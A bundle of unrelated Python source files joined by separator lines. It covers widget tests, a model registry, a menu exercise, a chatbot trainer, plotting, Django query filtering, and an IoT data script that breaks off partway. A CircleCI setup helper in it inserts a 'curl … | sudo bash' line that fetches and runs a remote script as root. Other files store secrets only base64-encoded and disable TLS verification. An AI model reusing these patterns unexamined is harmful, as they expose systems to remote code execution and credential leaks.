def _reset_caches(self):
try:
del self._re_cache[self.regexp]
except KeyError:
pass
|
"""Tests for groove selection widget."""
import pytest
import weldx
from weldx.welding.groove.iso_9692_1 import _create_test_grooves
from weldx_widgets import WidgetGrooveSelection, WidgetGrooveSelectionTCPMovement
test_grooves = _create_test_grooves()
@pytest.mark.parametrize("groove_name", test_grooves.keys())
def test_groove_sel(groove_name):
"""Check form restoration from test grooves."""
groove_obj = test_grooves[groove_name][0]
w = WidgetGrooveSelection()
w.groove_obj = groove_obj
tree = w.to_tree()
gui_params = w.groove_params_dropdowns
if not groove_name.startswith("ff"): # non ff-grooves
assert gui_params["workpiece_thickness"].quantity == groove_obj.t
assert gui_params["root_gap"].quantity == groove_obj.b
try:
assert gui_params["root_face"].quantity == groove_obj.c
except AttributeError:
pass
try:
assert gui_params["groove_angle"].quantity == groove_obj.alpha
except AttributeError:
pass
else:
assert gui_params["workpiece_thickness"].quantity == groove_obj.t_1
w2 = WidgetGrooveSelection()
w2.from_tree(tree)
tree2 = w2.to_tree()
assert tree2 == tree
def test_groove_linear_sel_tcp_movement_export():
"""Test export."""
w = WidgetGrooveSelectionTCPMovement()
w.create_csm_and_plot()
    w.geometry_export.create_btn.click()  # simulate a geometry export with defaults.
tree = w.to_tree()
# dump
tree = weldx.WeldxFile(tree=tree, mode="rw")
tree.pop("asdf_library")
tree.pop("history")
w2 = WidgetGrooveSelectionTCPMovement()
w2.from_tree(tree)
tree2 = w2.to_tree()
assert tree2 == tree
|
# coding=utf-8
"""Source registry.
This module provides a unique mixin _SourceFileRegistry to be
included in the Megamodel class.
"""
from collections import OrderedDict
from typing import List, Dict, Optional, ClassVar
from modelscript.base.exceptions import (
NotFound)
DEBUG = 0
Metamodel = 'Metamodel'
MetamodelDependency = 'MetamodelDependency'
Model = 'Model'
ModelDependency = 'ModelDependency'
ModelSourceFile = 'ModelOldSourceFile'
SourceFileDependency = 'SourceFileDependency'
__all__ = (
    '_SourceFileRegistry',
)
class _SourceFileRegistry(object):
""" Part of the megamodel dealing with source files. """
_allSourceFiles: \
ClassVar[List[ModelSourceFile]] \
= []
    _sourceFileByPath: \
        ClassVar[Dict[str, ModelSourceFile]] \
= OrderedDict()
_sourceFilesByMetamodel: \
ClassVar[Dict[Metamodel, List[ModelSourceFile]]] \
= OrderedDict()
_allSourceFileDependencies:\
ClassVar[List[SourceFileDependency]] \
= []
    _sourceFileDependenciesBySource: \
        ClassVar[Dict[ModelSourceFile, List[SourceFileDependency]]] \
= OrderedDict()
    _sourceFileDependenciesByTarget: \
        ClassVar[Dict[ModelSourceFile, List[SourceFileDependency]]] \
= {}
# --------------------------------------------------
# Registering sources and dependencies
# --------------------------------------------------
@classmethod
def registerSourceFile(cls, source: ModelSourceFile) -> None:
""" Register a source. Register the corresponding model as well.
"""
if DEBUG >= 1:
print(('RSC: registerSourceFile(%s)' % source.fileName))
if source.path not in cls._sourceFileByPath:
cls._allSourceFiles.append(source)
# ByPath
metamodel = source.metamodel
cls._sourceFileByPath[source.path] = source
# ByMetamodel
if metamodel not in cls._sourceFilesByMetamodel:
cls._sourceFilesByMetamodel[metamodel] = []
if source not in cls._sourceFilesByMetamodel[metamodel]:
cls._sourceFilesByMetamodel[metamodel].append(source)
# Register model
if source.model is not None:
from modelscript.megamodels import Megamodel
Megamodel.registerModel(source.model)
@classmethod
def registerSourceFileDependency(
cls,
sourceDependency: SourceFileDependency) -> None:
""" Register a source file dependency.
Register before the source and target if not done before.
Also register the model dependency if needed.
"""
source = sourceDependency.source
target = sourceDependency.target
# Element registration
cls.registerSourceFile(source)
cls.registerSourceFile(target)
from modelscript.megamodels import Megamodel
Megamodel.registerModel(source.model)
Megamodel.registerModel(target.model)
cls._allSourceFileDependencies.append(sourceDependency)
# BySource
if source not in cls._sourceFileDependenciesBySource:
cls._sourceFileDependenciesBySource[source] = []
cls._sourceFileDependenciesBySource[source].append(sourceDependency)
# ByTarget
if target not in cls._sourceFileDependenciesByTarget:
cls._sourceFileDependenciesByTarget[target] = []
cls._sourceFileDependenciesByTarget[target].append(sourceDependency)
# Model dependency creation is done in constructor
# of SourceFileDependency. Nothing to do here.
# --------------------------------------------------
# Retrieving information from the megamodel
# --------------------------------------------------
@classmethod
# The name sourceFile instead of source is due to a conflict
# with the method sources() (with "sources" and "targets"()) in the
# MegamodelElement class.
def sourceFiles(cls,
metamodel: Optional[Metamodel] = None)\
-> List[ModelSourceFile]:
"""Return all source files for a given metamodel.
If no metamodel is provided, then return all sources.
"""
if metamodel is None:
return cls._allSourceFiles
else:
return cls._sourceFilesByMetamodel[metamodel]
@classmethod
    def sourceFile(cls, path: str) -> ModelSourceFile:
"""Return a source given its path.
        If the path does not correspond to a registered source file then
raise NotFound.
"""
if path in cls._sourceFileByPath:
return cls._sourceFileByPath[path]
else:
raise NotFound( # raise:ok
'No source at "%s"' % path)
@classmethod
def _outSourceDependencies(
cls,
source: ModelSourceFile) \
-> List[SourceFileDependency]:
"""Dependencies from source or None """
if source not in cls._sourceFileDependenciesBySource:
return []
else:
return cls._sourceFileDependenciesBySource[source]
@classmethod
def _inSourceDependencies(
cls,
target: ModelSourceFile)\
-> List[SourceFileDependency]:
"""Dependencies to target or None """
if target not in cls._sourceFileDependenciesByTarget:
return []
else:
return cls._sourceFileDependenciesByTarget[target]
@classmethod
def sourceDependencies(
cls,
source: Optional[ModelSourceFile] = None,
target: Optional[ModelSourceFile] = None,
metamodelDependency: Optional[MetamodelDependency] = None) \
-> List[SourceFileDependency]:
"""Return sources dependencies according either to the
source source file, target source file, or metamodel
dependency.
If no parameter is provided then return all dependencies.
"""
# (1) First filter by source and target
if source is None and target is None:
# all dependencies
deps = cls._allSourceFileDependencies
elif source is not None and target is None:
# return dependencies from source
deps = cls._outSourceDependencies(source)
elif source is None and target is not None:
# return dependencies to target
deps = cls._inSourceDependencies(target)
else:
# return dependencies between source and target
deps = [
d for d in cls._outSourceDependencies(source)
if d.target == target
]
# (2) Second filter with metamodelDependency
if metamodelDependency is None:
return deps
else:
return [
dep for dep in deps
if dep.metamodelDependency == metamodelDependency
]
@classmethod
def sourceDependency(cls,
source: ModelSourceFile,
target: ModelSourceFile)\
-> Optional[SourceFileDependency]:
"""Return the dependency between source and target"""
d = cls.sourceDependencies(source=source, target=target)
if len(d) == 1:
return d[0]
else:
return None
@classmethod
def sourceFileList(cls, origins=None):
if origins is None:
origins = cls.sourceFiles()
visited = []
output = []
# def visit(source_file):
# if source_file not in visited:
# visited.insert(0, source_file)
# for x in source_file.usedSourceFiles:
# if x not in visited:
# visit(x)
# for x in origins:
# visit(x)
def visit(source_file):
if source_file not in visited:
visited.append(source_file)
for x in source_file.usedSourceFiles:
if x not in visited:
visit(x)
output.append(source_file)
for x in list(origins):
visit(x)
return output
|
from os import X_OK, pardir
print("""
**************************************
** Welcome to the Snakes Cafe! **
** Please see our menu below. **
**
** To quit at any time, type "quit" **
**************************************
Appetizers
----------
Wings
Cookies
Spring Rolls
Entrees
-------
Salmon
Steak
Meat Tornado
A Literal Garden
Desserts
--------
Ice Cream
Cake
Pie
Drinks
------
Coffee
Tea
Unicorn Tears
***********************************
** What would you like to order? **
***********************************
""")
menu = {
    "WINGS": 0,
    "COOKIES": 0,
    "SPRING ROLLS": 0,
    "SALMON": 0,
    "STEAK": 0,
    "MEAT TORNADO": 0,
    "A LITERAL GARDEN": 0,
    "ICE CREAM": 0,
    "CAKE": 0,
    "PIE": 0,
    "COFFEE": 0,
    "TEA": 0,
    "UNICORN TEARS": 0,
}
def handle_input(x):
    x = x.upper()
    if x not in menu:
        return f"** Sorry, {x} is not on the menu **"
    menu[x] += 1
    return f"** {menu[x]} order(s) of {x} have been added to your meal **"
while True:
user_input = input("> ")
if user_input == 'quit':
print('Thanks for your order - BYE', menu)
break
print(handle_input(user_input))
|
import base64
import json
import os.path
from os.path import expanduser
from ditto.core import logger
def get(key):
cls = DittoConfig()
val = cls.get(key)
return val
def not_set(key):
cls = DittoConfig()
val = cls.get(key)
return val is None
def set(key, val):
cls = DittoConfig()
cls.set(key, val)
class DittoConfig:
def __init__(self):
self.config_path = os.path.abspath(os.path.join(expanduser("~"), ".ditto-cli"))
self.get_config()
def get_config(self):
if not os.path.isfile(self.config_path):
self.set_config({})
config_file = open(self.config_path, "r")
data = json.load(config_file)
config_file.close()
return data
def set_config(self, config):
config_file = open(self.config_path, 'w+')
config_file.write(json.dumps(config, indent=4, sort_keys=True))
config_file.close()
def get(self, key):
config = self.get_config()
if key in config:
            return base64.b64decode(config[key]).decode('utf-8')
else:
return None
def set(self, key, value, overwrite=True):
config = self.get_config()
if overwrite or (key not in config):
            config[key] = base64.b64encode(value.encode('utf-8')).decode('utf-8')
self.set_config(config)
def rm(self, key):
config = dict(self.get_config())
del config[key]
self.set_config(config)
def list(self):
config = self.get_config()
for key in config:
logger.log(key + ': ' + self.get(key))
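# --- Hedged usage sketch (not part of the original module) ---
# set() base64-encodes the value into the real ~/.ditto-cli file and get()
# decodes it again; "api_token" is just an illustrative key.
if __name__ == "__main__":
    set("api_token", "s3cr3t")
    print(get("api_token"))    # -> s3cr3t
    print(not_set("missing"))  # -> True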
|
#!/usr/bin/env python
# encoding: utf-8
"""
Handling of the generate subcommand
"""
# ---------------------------------------------------------------------------
# Standard imports:
import os
import subprocess
import shutil
# Local imports
from .. import codegen
from .. import modelutils
from .. import utils
from . import common
# ---------------------------------------------------------------------------
ENUM_PACKAGE_TPL = "{base}.{schema}.enums"
ENUM_CONVERTER_PACKAGE_TPL = ENUM_PACKAGE_TPL + ".converters"
DB_QUERY_PACKAGE_TPL = "{base}.{schema}.db"
def _generate_db_schema_ddl(metadata, schema, output_dir):
utils.print_section_header("Database Creation DDL")
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
engines = ("mysql",)
for engine in engines:
file_name = f"full_ddl.{schema.lower()}.{engine}.sql"
file_path = os.path.join(output_dir, file_name)
with open(file_path, "w") as fsqlout:
fsqlout.write(metadata.ddl(engine))
utils.print_action(f"Generating database schema for {engine}")
utils.print_generated_file(file_name)
utils.print_end_action()
def _find_java():
"""
Provide the java executable path, searching first in JAVA_HOME, then in the
PATH
"""
java_home = os.environ.get("JAVA_HOME", None)
if java_home is not None:
java_path = os.path.join(java_home, "bin", "java")
if os.path.isfile(java_path) and os.access(java_path, os.X_OK):
return java_path
java_path = shutil.which("java")
return java_path
def _run_jooq(java, config_file, classpath=None):
"""
Run the jOOQ generator with the give configuration file and classpath
"""
if java is None:
# No java path was explicitly provided, so search
java = _find_java()
command = [java]
if classpath is not None:
command.append("-classpath")
command.append(classpath)
command.append("org.jooq.util.GenerationTool")
command.append(config_file)
print(" ".join(command))
try:
subprocess.check_call(command)
except subprocess.CalledProcessError as cpe:
return cpe
def generate(args):
modelutils.validate_model(args.dbmodel)
schema_name = args.dbmodel.schema_name()
package_schema_name = schema_name.lower()
# Add schema to packages
enum_package = ENUM_PACKAGE_TPL.format(
base=args.java_package, schema=package_schema_name
)
enum_conv_package = ENUM_CONVERTER_PACKAGE_TPL.format(
base=args.java_package, schema=package_schema_name
)
db_query_package = DB_QUERY_PACKAGE_TPL.format(
base=args.java_package, schema=package_schema_name
)
code_generator = codegen.EnumCodeGenerator(
enums=args.dbmodel.enums,
code_dir=args.code_dir,
config_dir=args.config_dir,
enum_package=enum_package,
converter_package=enum_conv_package,
model_file=args.model_file,
)
# Generate Java enums and Converters for jOOQ
code_generator.generate_enum_java_code()
# Generate DB scripts for all used engines
_generate_db_schema_ddl(args.dbmodel.metadata, package_schema_name, args.sql_dir)
# Find the columns that use enum, boolean, etc. types to create a jOOQ mapping for them
type_mappings = common.get_type_mappings(args.dbmodel.metadata)
# Generate the XML config for the jOOQ code generator
jooq_config_file = code_generator.generate_jooq_config(
type_mappings, args.dbsettings, schema_name, db_query_package
)
if args.do_jooq:
# Create a temporary database, run the jOOQ generator on it, then remove it
with args.dbmodel.metadata.db_instance(args.dbsettings, not args.keep_db):
utils.print_action(
f"Running jOOQ generator on temporary database {args.dbsettings.name}"
)
error = _run_jooq(args.java, jooq_config_file, args.classpath)
utils.print_end_action(error)
if error is not None:
raise error
|
from os.path import isfile, join, exists
import re
import click
import logging
from stable_world.output.helpers import indent
from stable_world.py_helpers import ConfigParser
from stable_world import errors
from stable_world.interact.yaml_insert import yaml_add_lines_to_machine_pre
from .base import BucketConfigurator
logger = logging.getLogger(__name__)
# The alternation is grouped so the 'bucket' group is captured for both SSH and
# HTTPS remotes; raw strings avoid invalid-escape warnings.
GIT_URL_RE = re.compile(
    r'^((git@(?P<sshhost>[\w.]+):)'
    r'|(https://(.*?@)?(?P<httphost>[\w.]+)/))'
    r'(?P<bucket>[\w.]+/[\w.]+?)'
    r'(\.git)?$'
)
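# Hedged illustration (not in the original): both remote styles yield the same
# 'bucket' group, e.g.
#   GIT_URL_RE.match('git@github.com:acme/widgets.git').group('bucket')   -> 'acme/widgets'
#   GIT_URL_RE.match('https://github.com/acme/widgets').group('bucket')   -> 'acme/widgets'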
class CircleBucketHelper(BucketConfigurator):
@classmethod
def is_valid(cls, working_dir):
        if isfile(join(working_dir, 'circle.yml')):
            logger.info('Found CircleCI bucket "{}"'.format(working_dir))
            return True
        logger.info('Could not find circle.yml file in {}'.format(working_dir))
def get_git_remote(self):
parser = ConfigParser()
parser.read(join(self.working_dir, '.git', 'config'))
return parser.get('remote "origin"', 'url')
def __init__(self, *args):
BucketConfigurator.__init__(self, *args)
def setup(self):
        # TODO: configure git remote
click.echo(' Setup your CircleCI Bucket:\n')
uri = self.get_git_remote()
match = GIT_URL_RE.match(uri)
if not match:
raise errors.UserError('Literally can not even match %s' % uri)
self.values = GIT_URL_RE.match(uri).groupdict()
self.initial_bucket_name = self.values.get('bucket').replace('/', '-')
def setup_bucket_env(self):
host = self.values.get('httphost') or self.values.get('sshhost')
repo_part = None
if host == 'github.com':
repo_part = 'gh'
elif host == 'bitbucket.org':
repo_part = 'bb'
bucket = self.values.get('bucket')
circle_url = 'https://circleci.com/{repo_part}/{bucket}/edit#env-vars'.format(
repo_part=repo_part, bucket=bucket
)
click.echo('')
token = self.get_token()
click.echo(
' You need to navigate to your circleci bucket '
'and set a secure environment variable:'
)
click.echo('\n Go to ', nl=False)
click.secho('{}'.format(circle_url), fg='blue', underline=True, nl=False)
click.echo(' and click "Add Variable"\n')
click.echo(' Name:')
click.secho(' STABLE_WORLD_TOKEN', dim=True)
click.echo(' Value:')
click.secho(' {}'.format(token), dim=True)
ok = click.confirm('\n Launch browser', default=True)
if ok:
click.launch(circle_url)
def setup_bucket_ci(self):
circle_yaml = join(self.working_dir, 'circle.yml')
if exists(circle_yaml):
with open(circle_yaml) as fd:
text = fd.read()
else:
text = ''
        add_lines = [
            'curl {url}/install | sudo bash -s -- rc'.format(url=self.site_url),
            'stable.world use -b {bucket_name} -t build${{CIRCLE_BUILD_NUM}}'.format(
                bucket_name=self.bucket_name)
        ]
default = indent(yaml_add_lines_to_machine_pre('', add_lines), ' + ')
if 'stable.world use' in text:
click.echo(' It looks like you are already using stable.world')
            click.echo(' Your configuration should look like this:')
click.echo('')
click.secho(default, fg='green')
else:
new_text = yaml_add_lines_to_machine_pre(text, add_lines)
with open(circle_yaml, 'w') as fd:
fd.write(new_text)
click.echo(' The following lines were added to your circle.yml')
click.echo('')
click.secho(default, fg='green')
click.echo('')
            click.echo(' You need to commit this and push it to your repo')
click.pause(' Got it? (Press any key to continue ...)')
def setup_bucket_name(self):
bucket_name = self.initial_bucket_name
while 1:
if bucket_name:
ok = click.confirm(
' %30s: \'%s\'?' % ('name your bucket', bucket_name),
default=True
)
click.echo('')
if ok:
try:
self.client.add_bucket(bucket_name)
break
except errors.DuplicateKeyError:
click.echo('')
                        tml = ' The bucket "%s" already exists'
click.secho(' Warning: ', nl=False, fg='magenta')
click.echo(tml % bucket_name)
click.echo(' Bucket names must be unique')
ok = click.confirm('Use existing bucket?', default=False)
if ok:
break
else:
continue
bucket_name = click.prompt(' %30s' % 'name your bucket')
self.bucket_name = bucket_name
|
import numpy as np
import random
import json
import nltk
nltk.download('punkt')
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from nltk_utils import bag_of_words, tokenize, stem
from model import NeuralNet
with open('intents.json', 'r') as f:
intents = json.load(f)
all_words = []
tags = []
xy = []
# loop through each sentence in our intents patterns
for intent in intents['intents']:
tag = intent['tag']
    # add to tag list
tags.append(tag)
for pattern in intent['patterns']:
        # tokenize each word in the sentence
w = tokenize(pattern)
        # add to our words list
all_words.extend(w)
        # add to xy pair
xy.append((w, tag))
# stem and lowercase each word
ignore_words = ['?', '.', '!']
all_words = [stem(w) for w in all_words if w not in ignore_words]
# remove duplicates and sort
all_words = sorted(set(all_words))
tags = sorted(set(tags))
print(len(xy), "patterns")
print(len(tags), "tags:", tags)
print(len(all_words), "unique stemmed words:", all_words)
# create training data
X_train = []
y_train = []
for (pattern_sentence, tag) in xy:
    # X: bag of words for each pattern_sentence
bag = bag_of_words(pattern_sentence, all_words)
X_train.append(bag)
    # y: PyTorch CrossEntropyLoss needs only class labels, not one-hot
label = tags.index(tag)
y_train.append(label)
X_train = np.array(X_train)
y_train = np.array(y_train)
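# Illustrative sketch of the feature encoding above (assumes bag_of_words from
# nltk_utils returns a float vector over all_words, 1.0 where a stemmed token occurs):
#   tokenize("Hi there")                                   -> ["Hi", "there"]
#   bag_of_words(["Hi", "there"], ["hi", "how", "there"])  -> [1.0, 0.0, 1.0]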
# Hyper-parameters
num_epochs = 1000
batch_size = 8
learning_rate = 0.001
input_size = len(X_train[0])
hidden_size = 8
output_size = len(tags)
print(input_size, output_size)
class ChatDataset(Dataset):
def __init__(self):
self.n_samples = len(X_train)
self.x_data = X_train
self.y_data = y_train
    # support indexing such that dataset[i] can be used to get i-th sample
def __getitem__(self, index):
return self.x_data[index], self.y_data[index]
    # we can call len(dataset) to return the size
def __len__(self):
return self.n_samples
dataset = ChatDataset()
train_loader = DataLoader(dataset=dataset,
batch_size=batch_size,
shuffle=True,
num_workers=0)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = NeuralNet(input_size, hidden_size, output_size).to(device)
# Loss and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# Train the model
for epoch in range(num_epochs):
for (words, labels) in train_loader:
words = words.to(device)
labels = labels.to(dtype=torch.long).to(device)
        # Forward pass
outputs = model(words)
# if y would be one-hot, we must apply
# labels = torch.max(labels, 1)[1]
loss = criterion(outputs, labels)
        # Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (epoch+1) % 100 == 0:
print (f'Epoch [{epoch+1}/{num_epochs}], Loss: {loss.item():.4f}')
print(f'final loss: {loss.item():.4f}')
data = {
"model_state": model.state_dict(),
"input_size": input_size,
"hidden_size": hidden_size,
"output_size": output_size,
"all_words": all_words,
"tags": tags
}
FILE = "data.pth"
torch.save(data, FILE)
print(f'training complete. file saved to {FILE}')
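# Minimal loading sketch for later inference (hypothetical companion script; it
# simply mirrors the keys saved in `data` above):
#   data = torch.load(FILE)
#   model = NeuralNet(data["input_size"], data["hidden_size"], data["output_size"])
#   model.load_state_dict(data["model_state"])
#   model.eval()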
|
import os
import sys
import bokeh.layouts as bkl
import bokeh.plotting as bkp
import numpy as np
# make it so we can import models/etc from parent folder
sys.path.insert(1, os.path.join(sys.path[0], '../common'))
from plotting import *
from bokeh.io import export_svgs
import cairosvg
size_x_axis = False
trial_num = 1
nm = ('IHT-2', 'A-IHT II')
Ms = [0, 20, 50, 100]
np.random.seed(5)
# plot the KL figure
# plot the sequence of coreset pts and comparison of nonopt + opt
res = np.load('results/results_' + nm[0] + '_' + str(trial_num) + '.npz')
x = res['x']
wt = res['w']
Sig = res['Sig']
mup = res['mup']
Sigp = res['Sigp']
muwt = res['muw']
Sigwt = res['Sigw']
# if dim x > 2, project onto two random orthogonal axes
if x.shape[1] > 2:
##centering on the true data gen dist
# true_th = np.ones(mup.shape[0])
# x-= true_th
# mup -= true_th
# muwt -= true_th
# project onto two random axes
a1 = np.random.randn(x.shape[1])
a2 = np.random.randn(x.shape[1])
a1 /= np.sqrt((a1 ** 2).sum())
a2 -= a2.dot(a1) * a1
a2 /= np.sqrt((a2 ** 2).sum())
a = np.hstack((a1[:, np.newaxis], a2[:, np.newaxis]))
x = x.dot(a)
mup = mup.dot(a)
muwt = muwt.dot(a)
Sig = a.T.dot(Sig.dot(a))
Sigp = a.T.dot(Sigp.dot(a))
Sigwttmp = np.zeros((Sigwt.shape[0], 2, 2))
for i in range(Sigwt.shape[0]):
Sigwttmp[i, :, :] = a.T.dot(Sigwt[i, :, :].dot(a))
Sigwt = Sigwttmp
##shift everything to be back to true th
# true_th = true_th[:2]
# x += true_th
# mup += true_th
# muwt += true_th
figs = []
for m in Ms:
x_range = (-4.2, 4.2)
y_range = (-3, 5.4)
fig = bkp.figure(x_range=x_range, y_range=y_range, plot_width=750, plot_height=750)
preprocess_plot(fig, '24pt', False, False)
msz = np.where((wt > 0).sum(axis=1) <= m)[0][-1]
fig.scatter(x[:, 0], x[:, 1], fill_color='black', size=10, alpha=0.09)
if size_x_axis:
fig.scatter(x[:, 0], x[:, 1], fill_color='black',
size=10 * (wt[msz, :] > 0) + 40 * wt[msz, :] / wt[msz, :].max(), line_color=None)
else:
fig.scatter(x[:, 0], x[:, 1], fill_color='black', size=10 * (wt[msz, :] > 0) + 40 * wt[m, :] / wt[m, :].max(),
line_color=None)
plot_gaussian(fig, mup, (4. / 9.) * Sigp, (4. / 9.) * Sig, 'black', 17, 9, 1, 1, 'solid', 'Exact')
if size_x_axis:
plot_gaussian(fig, muwt[msz, :], (9. / 9.) * Sigwt[msz, :], (9. / 9.) * Sig, pal[4], 17, 9, 1, 1, 'solid',
nm[1] + ', size ' + str((wt[msz, :] > 0).sum()))
else:
plot_gaussian(fig, muwt[m, :], (4. / 9.) * Sigwt[m, :], (4. / 9.) * Sig, pal[4], 17, 9, 1, 1, 'solid',
nm[1] + ', ' + str(m) + ' pts')
postprocess_plot(fig, '24pt', orientation='horizontal', glyph_width=80)
fig.legend.background_fill_alpha = 0.
fig.legend.border_line_alpha = 0.
# f.legend.visible=False
fig.xaxis.visible = False
fig.yaxis.visible = False
figs.append(fig)
# figure output
fig.output_backend = 'svg'
fig_name = 'exp1-coresets_' + 'm' + str(m) +'_id_' + str(trial_num)
export_svgs(fig, filename=fig_name + '.svg')
cairosvg.svg2pdf(
file_obj=open(fig_name + '.svg', "rb"), write_to=fig_name + '.pdf')
bkp.show(bkl.gridplot([figs]))
|
from django.db.models.query_utils import Q
from care.facility.models.patient_consultation import PatientConsultation
from care.users.models import User
from care.utils.cache.cache_allowed_facilities import get_accessible_facilities
def get_consultation_queryset(user):
queryset = PatientConsultation.objects.all()
if user.is_superuser:
return queryset
if user.user_type >= User.TYPE_VALUE_MAP["StateLabAdmin"]:
q_filters = Q(facility__state=user.state)
q_filters |= Q(patient__facility__state=user.state)
queryset = queryset.filter(q_filters)
elif user.user_type >= User.TYPE_VALUE_MAP["DistrictLabAdmin"]:
q_filters = Q(facility__district=user.district)
q_filters |= Q(patient__facility__district=user.district)
queryset = queryset.filter(q_filters)
else:
allowed_facilities = get_accessible_facilities(user)
q_filters = Q(facility__id__in=allowed_facilities)
q_filters |= Q(patient__facility__id__in=allowed_facilities)
q_filters |= Q(assigned_to=user)
q_filters |= Q(patient__assigned_to=user)
queryset = queryset.filter(q_filters)
return queryset
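# Illustrative usage sketch (hypothetical DRF viewset; only the get_queryset
# override is assumed here):
#   class PatientConsultationViewSet(ReadOnlyModelViewSet):
#       def get_queryset(self):
#           return get_consultation_queryset(self.request.user)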
|
#Copyright 2018 OSIsoft, LLC
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
#<http://www.apache.org/licenses/LICENSE-2.0>
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
# NOTE: this script was designed using the v1.0
# version of the OMF specification, as outlined here:
# http://omf-docs.readthedocs.io/en/v1.0/index.html
# ************************************************************************
# Import necessary packages
# ************************************************************************
# Import packages
import json
import time
import platform
import socket
import datetime
import random # Used to generate sample data; comment out this line if real data is used
import requests
# Import any special packages needed for a particular hardware platform,
# for example, for a Raspberry PI,
# import RPi.GPIO as GPIO
import sense_hat # Used for controlling the Sense Hat
import sys # Used to parse error messages
import os # Used to sync the internal clock
import socket # Used to get the current host name
import webcolors # Used to allow easily referencing colors by name
# ************************************************************************
# Specify constant values (names, target URLs, et cetera) needed by the script
# ************************************************************************
# Specify the name of this device, or simply use the hostname; this is the name
# of the PI AF Element that will be created, and it'll be included in the names
# of PI Points that get created as well
DEVICE_NAME = (socket.gethostname()) + " Raspberry Pi"
#DEVICE_NAME = "MyCustomDeviceName"
# Specify a device location (optional); this will be added as a static
# string attribute to the AF Element that is created
DEVICE_LOCATION = "IoT Test Lab"
# Specify the name of the Assets type message; this will also end up becoming
# part of the name of the PI AF Element template that is created; for example, this could be
# "AssetsType_RaspberryPI" or "AssetsType_Dragonboard"
# You will want to make this different for each general class of IoT module that you use
ASSETS_MESSAGE_TYPE_NAME = DEVICE_NAME + "_assets_type"
#ASSETS_MESSAGE_TYPE_NAME = "assets_type" + "IoT Device Model 74656" # An example
# Note: you can replace DEVICE_NAME with DEVICE_TYPE if you'd like to use a common type for multiple assets
# Similarly, specify the name of for the data values type; this should likewise be unique
# for each general class of IoT device--for example, if you were running this
# script on two different devices, each with different numbers and kinds of sensors,
# you'd specify a different data values message type name
# when running the script on each device. If both devices were the same,
# you could use the same DATA_VALUES_MESSAGE_TYPE_NAME
DATA_VALUES_MESSAGE_TYPE_NAME = DEVICE_NAME + "_data_values_type"
#DATA_VALUES_MESSAGE_TYPE_NAME = "data_values_type" + "IoT Device Model 74656" # An example
# Note: you can replace DEVICE_NAME with DEVICE_TYPE if you'd like to use a common type for multiple assets
# Store the id of the container that will be used to receive live data values
DATA_VALUES_CONTAINER_ID = DEVICE_NAME + "_data_values_container"
# Specify the number of seconds to sleep in between value messages
NUMBER_OF_SECONDS_BETWEEN_VALUE_MESSAGES = 2
# Specify whether you're sending data to OSIsoft cloud services or not
SEND_DATA_TO_OSISOFT_CLOUD_SERVICES = False
# Specify the address of the destination endpoint; it should be of the form
# http://<host/ip>:<port>/ingress/messages
# For example, "https://myservername:8118/ingress/messages"
TARGET_URL = "https://pisystem.cloudapp.azure.com:5460/ingress/messages"
# !!! Note: if sending data to OSIsoft cloud services,
# uncomment the below line in order to set the target URL to the OCS OMF endpoint:
#TARGET_URL = "https://dat-a.osisoft.com/api/omf"
# Specify the producer token, a unique token used to identify and authorize a given OMF producer. Consult the OSIsoft Cloud Services or PI Connector Relay documentation for further information.
PRODUCER_TOKEN = "OMFv1"
#PRODUCER_TOKEN = "778408" # An example
# !!! Note: if sending data to OSIsoft cloud services, the producer token should be the
# security token obtained for a particular Tenant and Publisher; see
# http://qi-docs.readthedocs.io/en/latest/OMF_Ingress_Specification.html#headers
#PRODUCER_TOKEN = ""
# ************************************************************************
# Specify options for sending web requests to the target
# ************************************************************************
# If self-signed certificates are used (true by default),
# do not verify HTTPS SSL certificates; normally, leave this as is
VERIFY_SSL = False
# Specify the timeout, in seconds, for sending web requests
# (if it takes longer than this to send a message, an error will be thrown)
WEB_REQUEST_TIMEOUT_SECONDS = 30
# ************************************************************************
# Helper function: run any code needed to initialize local sensors, if necessary for this hardware
# ************************************************************************
# Below is where you can initialize any global variables that are needed by your application;
# certain sensors, for example, will require global interface or sensor variables
# myExampleInterfaceKitGlobalVar = None
# Specify whether the lights should turn off at night;
# if set to true, LEDs will be disabled between 10 PM - 7 AM
NIGHT_MODE_ENABLED = True
# Define the color bar that will be used for each row of LEDs
RED_TO_GREEN_COLOR_BAR = [
webcolors.name_to_rgb('MAGENTA'),
webcolors.name_to_rgb('RED'),
webcolors.name_to_rgb('ORANGE'),
webcolors.name_to_rgb('YELLOW'),
webcolors.name_to_rgb('YELLOWGREEN'),
webcolors.name_to_rgb('GREEN'),
webcolors.name_to_rgb('LightSeaGreen'),
webcolors.name_to_rgb('BLUE')
]
# Specify a default background color for LEDs
DEFAULT_BACKGROUND_COLOR = webcolors.name_to_rgb('navy')
# Initialize a global array for holding the most recent 8 readings
recentReadings = [1, 1, 1, 1, 1, 1, 1, 1]
# Initialize the sensor hat object
sense = sense_hat.SenseHat()
# The following function is where you can insert specific initialization code to set up
# sensors for a particular IoT module or platform
def initialize_sensors():
print("\n--- Sensors initializing...")
try:
#For a raspberry pi, for example, to set up pins 4 and 5, you would add
#GPIO.setmode(GPIO.BCM)
#GPIO.setup(4, GPIO.IN)
#GPIO.setup(5, GPIO.IN)
print("--- Waiting 10 seconds for sensors to warm up...")
time.sleep(10)
# Activate the compass, gyro, and accelerometer
sense.set_imu_config(True, True, True)
sense.show_message("Ready!")
print("Gyro initialized...")
print("--- Sensors initialized!")
# Sync the time on this device to an internet time server
try:
print('Syncing time...')
os.system('sudo service ntpd stop')
time.sleep(1)
os.system('sudo ntpd -gq')
time.sleep(1)
os.system('sudo service ntpd start')
print('Success! Time is ' + str(datetime.datetime.now()))
except:
print('Error syncing time!')
except Exception as ex:
# Log any error, if it occurs
print(str(datetime.datetime.now()) + " Error when initializing sensors: " + str(ex))
# ************************************************************************
# Helper function: REQUIRED: create a JSON message that contains sensor data values
# ************************************************************************
# The following function you can customize to allow this script to send along any
# number of different data values, so long as the values that you send here match
# up with the values defined in the "DataValuesType" OMF message type (see the next section)
